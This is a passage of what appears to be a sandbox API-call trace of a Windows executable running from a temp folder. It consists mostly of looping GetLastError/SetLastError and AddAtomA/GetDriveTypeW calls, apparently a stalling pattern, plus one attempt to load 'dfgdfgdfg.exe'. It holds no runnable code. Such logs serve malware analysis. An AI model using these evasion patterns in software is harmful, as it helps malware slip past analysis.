22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x49\xcb\xff\x08\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0093.258] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x30 [0093.258] GetLastError () returned 0x0 [0093.258] SetLastError (dwErrCode=0x0) [0093.258] GetLastError () returned 0x0 [0093.258] SetLastError (dwErrCode=0x0) [0093.258] GetLastError () returned 0x0 [0093.258] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.259] GetLastError () returned 0x0 [0093.259] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.260] SetLastError (dwErrCode=0x0) [0093.260] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.261] GetLastError () returned 0x0 [0093.261] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.262] GetLastError () returned 0x0 [0093.262] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.263] SetLastError (dwErrCode=0x0) [0093.263] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.264] GetLastError () returned 0x0 [0093.264] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.265] GetLastError () returned 0x0 [0093.265] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.266] SetLastError (dwErrCode=0x0) [0093.266] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.267] GetLastError () returned 0x0 [0093.267] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.268] GetLastError () returned 0x0 [0093.268] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.275] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0093.275] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0093.276] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") returned 0x0 [0093.276] AddAtomA (lpString=0x0) returned 0x0 [0093.276] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.276] AddAtomA (lpString=0x0) returned 0x0 [0093.276] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] 